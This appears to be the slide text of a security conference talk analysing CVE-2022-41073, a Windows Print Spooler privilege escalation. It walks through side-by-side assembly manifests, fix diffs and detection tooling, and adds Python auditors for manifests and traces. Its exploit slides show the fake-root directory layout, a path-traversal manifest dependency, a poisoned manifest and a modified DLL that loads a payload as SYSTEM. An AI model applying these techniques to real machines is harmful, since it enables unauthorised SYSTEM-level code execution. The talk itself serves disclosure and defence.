OffensiveCon2023.PrintSpooler

Maddie Stone

James Forshaw
OffensiveCon 2023
CVE-2022-41073

https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-41073.html
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073
Oct 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
    ULONG_PTR ulCookie;
    ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
    HMODULE hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
    // ...
}
Nov 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
    ULONG_PTR ulCookie;
    ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
    HMODULE hModule;
    HANDLE hToken;
+   if (RevertToProcess(&hToken)) {
        hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
+       ResumeImpersonation(hToken);
    }
    // ...
}
https://bugs.chromium.org/p/project-zero/issues/detail?id=240
[Diagram] Impersonating Caller: LoadLibrary(SharedLibrary.dll) resolves C:\ to the real root, so the DLL is read from C:\Windows\System32\SharedLibrary.dll.

[Diagram] Impersonating Caller with a Fake C:\ (MyFakeRoot): the same LoadLibrary(SharedLibrary.dll) resolves C:\ to the fake root, so Windows\System32\SharedLibrary.dll is read from under MyFakeRoot instead of the real C:\Windows\System32\SharedLibrary.dll.
https://twitter.com/tiraniddo/status/590931788006084609
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│   ├── MyFakeRoot.MANIFEST
│   └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
    ├── System32
    │   └── DriverStore
    │       └── FileRepository
    │           └── prnms003.inf_amd64_454b8d4f31e80f7d
    │               └── Amd64
    │                   └── PrintConfig.dll
    └── WinSxS
        └── Manifests
            ├── amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
            └── amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
What's in a MANIFEST?
DLL Hell

[Diagram] Application A installs its shared library: SharedLibrary.dll (version 2) goes into C:\Windows\System32.
[Diagram] Application B installs its shared library: SharedLibrary.dll (version 1) replaces it in C:\Windows\System32.
[Diagram] Application A and Application B now both get SharedLibrary.dll (version 1) from C:\Windows\System32.

Side by Side Assemblies

[Diagram] Application A gets SharedLibrary.dll (version 2) and Application B gets SharedLibrary.dll (version 1), both from C:\Windows\WinSxS.
PE Imports: No Version Information. Version information, but not detailed.

Application Manifest File

<assembly>
  <!-- Identity of the "Assembly" -->
  <assemblyIdentity name="App.A" version="1.0.0.0"/>
  <description>My APP A</description>
  <dependency>
    <!-- Dependencies of this Assembly -->
    <dependentAssembly>
      <assemblyIdentity
        name="SharedLibrary"
        version="2.0.0.0" processorArchitecture="*"
        publicKeyToken="6595b64144ccf1df" language="*" />
    </dependentAssembly>
  </dependency>
</assembly>
Using a Manifest

// Parse manifest file to an activation context
ACTCTX config = {};
config.cbSize = sizeof(config);
config.lpSource = L"c:\\example.manifest";
HANDLE actctx = CreateActCtx(&config);

// Activate and load library
ULONG_PTR cookie;
ActivateActCtx(actctx, &cookie);
HMODULE ret = LoadLibrary(L"SharedLibrary.dll");
DeactivateActCtx(0, cookie);
...
Assembly Searching Sequence

[Diagram] Application A's Application Manifest declares a dependency on SharedLibrary version 2.0.0.0:

<assembly>
  ...
  <dependency>
    <dependentAssembly>
      <assemblyIdentity
        name="SharedLibrary"
        version="2.0.0.0" />
    </dependentAssembly>
  </dependency>
</assembly>

[Diagram] The request goes to SXSSRV in CSRSS, which consults HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide and resolves the reference to version 2.0.1234.0.

[Diagram] SXSSRV then reads the Assembly Manifest C:\Windows\WinSxS\Manifests\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest:

<assembly>
  <assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
  <file name="SharedLibrary.dll"/>
  ...
</assembly>

[Diagram] SXSSRV returns an Activation Context to Application A.

Assembly Manifest File

<assembly>
  <assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
  <!-- More dependencies -->
  <dependency>
    <dependentAssembly>
      <assemblyIdentity
        name="SharedLibrary.resources" version="2.0.0.0"/>
    </dependentAssembly>
  </dependency>
  <!-- Assembly resources -->
  <file name="SharedLibrary.dll"/>
</assembly>
Load DLL From Assembly Directory

[Diagram] Application A calls LdrLoadDll(...) to load SharedLibrary.dll; the Activation Context redirects the load to C:\Windows\WinSxS\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0\SharedLibrary.dll.
https://www.microsoft.com/en-us/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits
Exploiting Activation Context Caching

[Diagram] SXSSRV in CSRSS keeps an Activation Context Cache keyed on the assembly manifest. A Malicious Application supplies its own assembly manifest under a key that aliases the legitimate C:\Windows\WinSxS\Manifests\amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest:

☠ Assembly Manifest (malicious)
<assembly>
  ...
  <file loadFrom="c:\evil.dll"
        name="SharedLibrary.dll"/>
</assembly>

Assembly Manifest (legitimate)
<assembly>
  ...
  <file name="SharedLibrary.dll"/>
</assembly>

[Diagram] A later Application whose manifest depends on SharedLibrary version 2.0.0.0 hits the aliased cache entry and receives the ☠ Activation Context, so its load of SharedLibrary.dll is redirected to evil.dll.

Weak Caching Key

https://bugs.chromium.org/p/project-zero/issues/detail?id=1749
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
Parsing the Manifest during DLL Loading
NTSTATUS BasepProbeForDllManifest(HMODULE DllHandle,
                                  PCWSTR FullDllName,
                                  HANDLE *ActCtx) {
    // Check for isolation aware manifest
    NTSTATUS result = LdrResFindResourceDirectory(DllHandle,
        RT_MANIFEST, ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
    if (NT_SUCCESS(result)) {
        // Create an activation context
        ACTCTX config;
        config.lpSource = FullDllName;
        config.lpResourceName = MAKEINTRESOURCE(ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
        config.hModule = DllHandle;
        *ActCtx = CreateActCtxW(&config);
        if (*ActCtx == INVALID_HANDLE_VALUE) {
            return NtCurrentTeb()->LastStatusValue;
        }
    }
    return result;
}
The Exploit
Does PrintConfig.dll have an Isolation Aware Manifest?

[Screenshot] Yes: it carries an ISOLATIONAWARE DLL manifest, and the manifest has dependencies.
[Diagram] Normal User (MEDIUM integrity): exploit.exe, holding a Fake C:\ (MyFakeRoot). SYSTEM integrity: csrss.exe, serving C:\Windows\WinSxS.

[Diagram] printfilterpipelinesvc.exe (SYSTEM) impersonates the caller (exploit.exe) and calls LoadLibrary(PrintConfig.dll).

[Diagram] The manifest in PrintConfig.dll sends a request to SXSSRV in csrss.exe, which also impersonates the caller while looking up C:\Windows\WinSxS.

[Diagram] Because the thread is impersonating, C:\ resolves to the Fake C:\ (MyFakeRoot), so SXSSRV reads the manifests from the fake root's Windows/WinSxS rather than the real C:\Windows\WinSxS.
Exploit Adds to Common Controls SxS Manifests

<dependentAssembly>
  <assemblyIdentity
    name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
    version="1.0.0.0"
    processorArchitecture="amd64"
    language="*"
    publicKeyToken="6595b64144ccf1df"
    type="win32" />
</dependentAssembly>
[Diagram] SXSSRV follows the added dependency from the fake WinSxS manifests to MyFakeRoot\MyFakeRoot.MANIFEST inside the Fake C:\ (MyFakeRoot).
MyFakeRoot.MANIFEST

<assembly>
  <assemblyIdentity
    name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
    version="1.0.0.0"
    processorArchitecture="amd64"
    publicKeyToken="6595b64144ccf1df"
    type="win32" />
  <!-- Redirect prntvpt.dll -->
  <file name="prntvpt.dll"/>
</assembly>
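As an added defensive example (written for this page, not code from the talk), a small Python audit that parses an assembly manifest like the ones above and flags the two things this chain relies on: an identity or dependency name that is a relative path instead of a bare assembly name, and a <file> element with a loadFrom redirect as in the activation-context caching slides. The sample manifest is constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not one of the talk's files): a common-controls style
# manifest with one ordinary dependency plus the path-traversing dependency
# name that the exploit appends to the WinSxS manifests.
SAMPLE_MANIFEST = """<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity name="Microsoft.Windows.Common-Controls" version="6.0.19041.1110"
      processorArchitecture="amd64" publicKeyToken="6595b64144ccf1df" type="win32"/>
  <file name="comctl32.dll"/>
  <dependency><dependentAssembly>
    <assemblyIdentity name="Microsoft.Windows.Common-Controls.Resources"
        version="6.0.0.0" processorArchitecture="amd64" type="win32"/>
  </dependentAssembly></dependency>
  <dependency><dependentAssembly>
    <assemblyIdentity name="..\\..\\..\\..\\..\\..\\MyFakeRoot\\MyFakeRoot"
        version="1.0.0.0" processorArchitecture="amd64" language="*"
        publicKeyToken="6595b64144ccf1df" type="win32"/>
  </dependentAssembly></dependency>
</assembly>"""


def is_path_like(name):
    """An assembly name is a bare identity; separators or '..' mean a path."""
    parts = re.split(r"[\\/]", name)
    return len(parts) > 1 or ".." in parts


def audit_manifest(xml_text):
    """Return findings for one assembly manifest; an empty list means clean."""
    root = ET.fromstring(xml_text)
    # Real WinSxS manifests use the asm.v1 namespace; the slide-style ones omit it.
    ns = root.tag[: root.tag.index("}") + 1] if root.tag.startswith("{") else ""
    findings = []
    own = root.find(f"{ns}assemblyIdentity")
    if own is not None and is_path_like(own.get("name", "")):
        findings.append(f"assembly identity is a path: {own.get('name')!r}")
    for dep in root.findall(f"{ns}dependency/{ns}dependentAssembly/{ns}assemblyIdentity"):
        if is_path_like(dep.get("name", "")):
            findings.append(f"dependency name is a path: {dep.get('name')!r}")
    for f in root.findall(f"{ns}file"):
        if f.get("loadFrom"):
            # loadFrom changes where the DLL is loaded from; every use deserves review.
            findings.append(f"file {f.get('name')!r} uses loadFrom={f.get('loadFrom')!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

Run it over the files in C:\Windows\WinSxS\Manifests to spot a dependency that was appended the way the exploit does it.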
[Diagram] csrss.exe (SXSSRV) returns an Activation Context to printfilterpipelinesvc.exe, so its LoadLibrary(PrintConfig.dll) now resolves prntvpt.dll to MyFakeRoot\prntvpt.dll in the Fake C:\ (MyFakeRoot).
Modification to prntvpt.dll

ATL::_dynamic_initializer_for::AtlBaseModule::()

HMODULE AutoMapNamedElementOnVisit(...) {
    // Turns off impersonation
    SetThreadToken(NULL, NULL);
    // Load final payload DLL.
    return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
                          NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
[Diagram] printfilterpipelinesvc.exe (SYSTEM) loads PrintConfig.dll, which pulls in the (fake) prntvpt.dll from the Fake C:\ (MyFakeRoot), which in turn loads MyFakeRoot\malicious.dll: ☠ malicious.dll ☠ now runs at SYSTEM integrity.
Nov 2022 - winspool.drv!LoadNewCopy
(the fix shown earlier: RevertToProcess() before LoadLibraryExW(), ResumeImpersonation() afterwards)
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

  DWORD dwAttr = OBJ_CASE_INSENSITIVE;

+ // Only true if the process explicitly enabled the mitigation.
+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+     ((dwFlags & 0x7000) == 0x7000)) {
+     dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ }
  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &Path, dwAttr, NULL, NULL);

  HANDLE hFile;
  NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...);
Dec 2022 - kernel32!BasepCreateActCtx
DWORD dwFlags = 0;
if (AssemblyManifestRedirectTrust::IsEnabled()) {
    // Checks for "System" Integrity Level
    if (IsSystemProcess())
        dwFlags |= 0x1000;
    // Is the thread currently impersonating?
    if (NtCurrentTeb()->IsImpersonating)
        dwFlags |= 0x2000;
    // Is mitigation enabled? If so final flags is 0x7000.
    if (((dwFlags & 0x3000) == 0x3000) &&
        KernelBaseAssemblyManifestIgnoreImpersonated) {
        dwFlags |= 0x4000;
    }
}
CsrBasepCreateActCtxCommon(dwFlags, ...);
Dec 2022 - kernelbase!SetProcessMitigationPolicy

  // ...
+ // Enumerated value 17, this is the SDK name which is clearly wrong!
+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&
+     AssemblyManifestRedirectTrust::IsEnabled()) {
+     BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
+     // Sets a global variable.
+     KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
+ }
  // ...
Jan 2023 - printfilterpipelinesvc!wWinMain

  // ...
+ DWORD Policy = TRUE;
+ SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
+                            &Policy, sizeof(Policy));
  // ...
CVE-2022-41073 Root Cause

The user can remap the root drive (C:\) for privileged processes
during impersonation.
A design flaw which has been known about since at least 2015.
Variant Analysis

[Diagram] The same flow with spoolsv.exe in place of printfilterpipelinesvc.exe: a SYSTEM process impersonating the caller (exploit.exe) calls LoadLibrary(PrintConfig.dll); csrss.exe (SXSSRV) impersonates the caller too, and the Fake C:\ (MyFakeRoot) makes Windows/WinSxS resolve under the fake root instead of C:\Windows\WinSxS.
May 2022 – localspl.dll

void PrintConfigDataHelper::CreateConfigProviderHandle() {
    LPCWSTR lpConfigPath = GetConfigFilePath();
    if (lpConfigPath && RevertToPrinterSelf()) {
        hModule = LoadLibrary(lpConfigPath);
        ImpersonatePrinterClient();
    }
    // ...
}

May 2022 – spoolsv!EnableMitigations
DWORD Policy = GetSpoolerRedirectionPolicy();
SetProcessMitigationPolicy(ProcessRedirectionTrustPolicy,
                           &Policy, sizeof(Policy));
// ...

if (MSRC70412_PrintManifestRedirectOptIn::IsEnabled()) {
    Policy = TRUE;
    SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
                               &Policy, sizeof(Policy));
}
// ...
Find DLL Loads using Process Monitor

Filter Option   Match         Value                   Result
User            begins with   NT AUTHORITY\           Include
Path            ends with     .dll                    Include
Operation       is            CreateFile              Include
Detail          contains      Impersonating: <USER>   Include
Detail          excludes      Execute/Traverse        Exclude
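The filter table as executable logic, added here rather than taken from the talk: it applies the five rules to a constructed Process Monitor CSV export and returns the SYSTEM-process DLL opens made while impersonating a user. The User column (not exported by default), the sample rows and the reading of the last row as "keep only opens that request Execute/Traverse access" are assumptions.

```python
import csv
import io

# Constructed Process Monitor CSV export (not a capture from the talk). Procmon
# does not export the User column by default; this assumes it was added under
# Options > Select Columns before saving.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail","User"
"10:00:01.0001","printfilterpipelinesvc.exe","1234","CreateFile","C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_454b8d4f31e80f7d\Amd64\PrintConfig.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse, Synchronize, Impersonating: DESKTOP-1\alice, OpenResult: Opened","NT AUTHORITY\SYSTEM"
"10:00:01.0002","printfilterpipelinesvc.exe","1234","CreateFile","C:\Windows\System32\prntvpt.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse, Synchronize, Impersonating: DESKTOP-1\alice, OpenResult: Opened","NT AUTHORITY\SYSTEM"
"10:00:01.0003","printfilterpipelinesvc.exe","1234","CreateFile","C:\Windows\System32\ntdll.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse, Synchronize, OpenResult: Opened","NT AUTHORITY\SYSTEM"
"10:00:01.0004","printfilterpipelinesvc.exe","1234","CreateFile","C:\Users\alice\temp.xml","SUCCESS","Desired Access: Generic Read, Impersonating: DESKTOP-1\alice, OpenResult: Opened","NT AUTHORITY\SYSTEM"
"10:00:01.0005","notepad.exe","4321","CreateFile","C:\Windows\System32\comctl32.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse, Synchronize, OpenResult: Opened","DESKTOP-1\alice"
"10:00:01.0006","printfilterpipelinesvc.exe","1234","ReadFile","C:\Windows\System32\prntvpt.dll","SUCCESS","Offset: 0, Length: 4,096, Impersonating: DESKTOP-1\alice","NT AUTHORITY\SYSTEM"
'''


def impersonated_dll_loads(csv_text):
    """Apply the filter table to an export; returns (process, path, impersonated user)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        detail = row["Detail"]
        if not row["User"].startswith("NT AUTHORITY\\"):
            continue  # User begins with NT AUTHORITY\ : Include
        if not row["Path"].lower().endswith(".dll"):
            continue  # Path ends with .dll : Include
        if row["Operation"] != "CreateFile":
            continue  # Operation is CreateFile : Include
        if "Impersonating:" not in detail:
            continue  # Detail contains Impersonating: <USER> : Include
        if "Execute/Traverse" not in detail:
            # "Detail excludes Execute/Traverse : Exclude" drops opens that do not
            # ask for execute access, so only real image loads survive (my reading
            # of the table; Procmon ANDs include filters across columns).
            continue
        user = detail.split("Impersonating: ", 1)[1].split(",")[0]
        hits.append((row["Process Name"], row["Path"], user))
    return hits


if __name__ == "__main__":
    for process, path, user in impersonated_dll_loads(SAMPLE_CSV):
        print(f"{process} opened {path} for execute while impersonating {user}")
```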


Check for the Process Mitigation

[Screenshot] Value of 1 indicates mitigation is set.

Check for Isolation Aware Manifest

[Screenshot] Needs to be "IsolationAware" and has at least one dependency.

Debugging SXS Loading

Start SXS trace

C:\> sxstrace Trace -logfile:my_trace.log

Parse SXS trace to a text file

C:\> sxstrace Parse -logfile:my_trace.log -outfile:my_trace.txt

INFO: Resolving reference ..\..\..\..\..\..\MyFakeRoot\MyFakeRoot,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="1.0.0.0".
INFO: Begin assembly probing.
INFO: Did not find the assembly in WinSxS.
INFO: Attempt to probe manifest at C:\WINDOWS\assembly\GAC_64\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot\1.0.0.0_en-US_6595b64144ccf1df\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot.DLL.
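An added parser for sxstrace Parse output (not part of the talk) that flags the two tells visible in the trace above: a "Resolving reference" whose assembly name is a path, and an "Attempt to probe manifest at" line whose path walks upward with "..", reported as the location it actually resolves to. The sample trace is constructed, with one ordinary resolution for contrast.

```python
import html
import ntpath
import re

# Constructed excerpt in the format of "sxstrace Parse" output (not the talk's
# trace): one ordinary resolution for contrast, then the two lines shown above.
SAMPLE_TRACE = """INFO: Resolving reference Microsoft.Windows.Common-Controls,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0".
INFO: Begin assembly probing.
INFO: End assembly probing.
INFO: Resolving reference ..&#x5c;..&#x5c;..&#x5c;..&#x5c;..&#x5c;..&#x5c;MyFakeRoot&#x5c;MyFakeRoot,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="1.0.0.0".
INFO: Begin assembly probing.
INFO: Did not find the assembly in WinSxS.
INFO: Attempt to probe manifest at C:\\WINDOWS\\assembly\\GAC_64\\..\\..\\..\\..\\..\\..\\MyFakeRoot\\MyFakeRoot\\1.0.0.0_en-US_6595b64144ccf1df\\..\\..\\..\\..\\..\\..\\MyFakeRoot\\MyFakeRoot.DLL.
INFO: End assembly probing.
"""

REF_RE = re.compile(r"^INFO: Resolving reference (.+?)\.?$")
PROBE_RE = re.compile(r"^INFO: Attempt to probe manifest at (.+?)\.?$")


def parse_reference(ref):
    """Split 'name,attr="v",...' into (name, {attr: v})."""
    name, _, rest = ref.partition(",")
    return name, dict(re.findall(r'(\w+)="([^"]*)"', rest))


def audit_sxstrace(text):
    """Return findings for an sxstrace text log; an empty list means nothing odd."""
    findings = []
    # html.unescape is a no-op on a raw log and repairs copies that were
    # HTML-entity-encoded (e.g. &#x5c; for the backslash).
    for line in html.unescape(text).splitlines():
        m = REF_RE.match(line)
        if m:
            name, attrs = parse_reference(m.group(1))
            parts = re.split(r"[\\/]", name)
            if len(parts) > 1 or ".." in parts:
                findings.append(f"reference name is a path: {name} (version {attrs.get('version')})")
            continue
        m = PROBE_RE.match(line)
        if m and ".." in m.group(1).split("\\"):
            # A legitimate probe never walks upward; show where it really lands.
            findings.append(f"probe escapes its base directory: {ntpath.normpath(m.group(1))}")
    return findings


if __name__ == "__main__":
    for finding in audit_sxstrace(SAMPLE_TRACE):
        print(finding)
```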
DEMO
Final Thoughts
Thank you!

Maddie Stone
James Forshaw